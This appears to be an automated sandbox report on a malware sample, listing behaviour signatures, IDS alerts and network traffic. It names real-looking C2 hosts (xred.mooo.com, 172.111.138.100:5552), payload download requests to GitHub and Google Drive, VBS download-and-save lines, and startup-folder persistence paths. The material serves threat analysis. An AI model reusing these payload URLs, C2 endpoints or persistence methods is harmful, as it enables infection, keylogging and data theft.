                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49771 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49775 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49778 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49776 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49777 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49795 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49794 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49798 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49796 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49802 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49804 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49809 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49808 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49813 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49819 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49826 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49827 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49831 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49832 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49839 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49838 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49849 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49851 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49862 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49861 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49866 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49867 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49913 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49914 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49915 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49921 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49947 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49949 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49946 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49948 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49958 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49959 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49968 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49970 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49992 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49993 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50019 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50021 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:50029 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:50034 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50057 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50056 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:50067 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50066 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50068 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:50069 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:50109 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:50111 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50122 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50123 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50133 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50132 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50156 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50157 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50168 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50169 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50196 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50197 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50221 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50222 version: TLS 1.2
                              Source: wscript.exe, 00000000.00000003.1766802777.000002235F9C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: wscript.exe, 00000000.00000003.1766802777.000002235F9C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: wscript.exe, 00000000.00000003.1766802777.000002235F9C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                              Source: wscript.exe, 00000000.00000003.1764738724.000002235FCCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: wscript.exe, 00000000.00000003.1764738724.000002235FCCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: wscript.exe, 00000000.00000003.1764738724.000002235FCCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                              Source: wscript.exe, 00000000.00000003.1765352606.000002235FEB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: wscript.exe, 00000000.00000003.1765352606.000002235FEB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: wscript.exe, 00000000.00000003.1765352606.000002235FEB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                              Source: update.exe, 00000001.00000000.1765967777.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: [autorun]
                              Source: update.exe, 00000001.00000000.1765967777.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: [autorun]
                              Source: update.exe, 00000001.00000000.1765967777.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: autorun.inf
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F2DD92 GetFileAttributesW,FindFirstFileW,FindClose,7_2_00F2DD92
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F62044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_00F62044
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F6219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_00F6219F
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F624A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,7_2_00F624A9
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F56B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,FindNextFileW,FindClose,FindClose,7_2_00F56B3F
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F56E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,FindNextFileW,FindClose,7_2_00F56E4A
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F5F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,7_2_00F5F350
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F5FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,7_2_00F5FDD2
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F5FD47 FindFirstFileW,FindClose,7_2_00F5FD47
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DB2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00DB2044
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DB219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00DB219F
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DB24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,16_2_00DB24A9
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DA6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,16_2_00DA6B3F
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DA6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,16_2_00DA6E4A
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DAF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,16_2_00DAF350
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DAFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,16_2_00DAFDD2
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D7DD92 GetFileAttributesW,FindFirstFileW,FindClose,16_2_00D7DD92
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DAFD47 FindFirstFileW,FindClose,16_2_00DAFD47
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F62044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,23_2_00F62044
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F6219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,23_2_00F6219F
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F624A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,23_2_00F624A9
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F56B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,23_2_00F56B3F
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F56E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,23_2_00F56E4A
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F5F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,23_2_00F5F350
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F5FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,23_2_00F5FDD2
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F2DD92 GetFileAttributesW,FindFirstFileW,FindClose,23_2_00F2DD92
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F5FD47 FindFirstFileW,FindClose,23_2_00F5FD47
                              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                              Source: excel.exeMemory has grown: Private usage: 5MB later: 71MB

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.4:49754 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.4:49754 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.4:49848 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.4:49747 -> 69.42.215.252:80
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.4:49800 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.4:49911 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.4:50010 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.4:50010 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.4:50099 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.4:50207 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.4:50277 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.4:50304 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.4:50304 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.4:50308 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.4:50309 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49744 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49749 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49743 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49757 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49752 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49784 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49762 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49795 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49797 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49771 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49779 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49760 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49776 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49781 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49755 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49794 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49778 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49785 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49772 -> 142.250.185.78:443
                              System process connects to network (likely due to code injection or exploit)
                              Source: C:\Windows\System32\wscript.exeNetwork Connect: 185.199.108.133 443Jump to behavior
                              C2 URLs / IPs found in malware configuration
                              Source: Malware configuration extractorURLs: xred.mooo.com
                              Potential malicious VBS script found (has network functionality)
                              Source: Initial file: .write swNKDZVm.responseBody
                              Source: Initial file: .savetofile FileName , 2
                              Uses dynamic DNS services
                              Source: unknownDNS query: name: freedns.afraid.org
                              Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
                              Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
                              Source: Joe Sandbox ViewIP Address: 172.111.138.100 172.111.138.100
                              Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                              Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                              Source: global trafficHTTP traffic detected: GET /knkbkk212/knkbkk212/refs/heads/main/FGNEBI.exe HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: raw.githubusercontent.comConnection: Keep-Alive
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F6550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,7_2_00F6550C
                              Source: global trafficHTTP traffic detected: GET /knkbkk212/knkbkk212/refs/heads/main/FGNEBI.exe HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: raw.githubusercontent.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
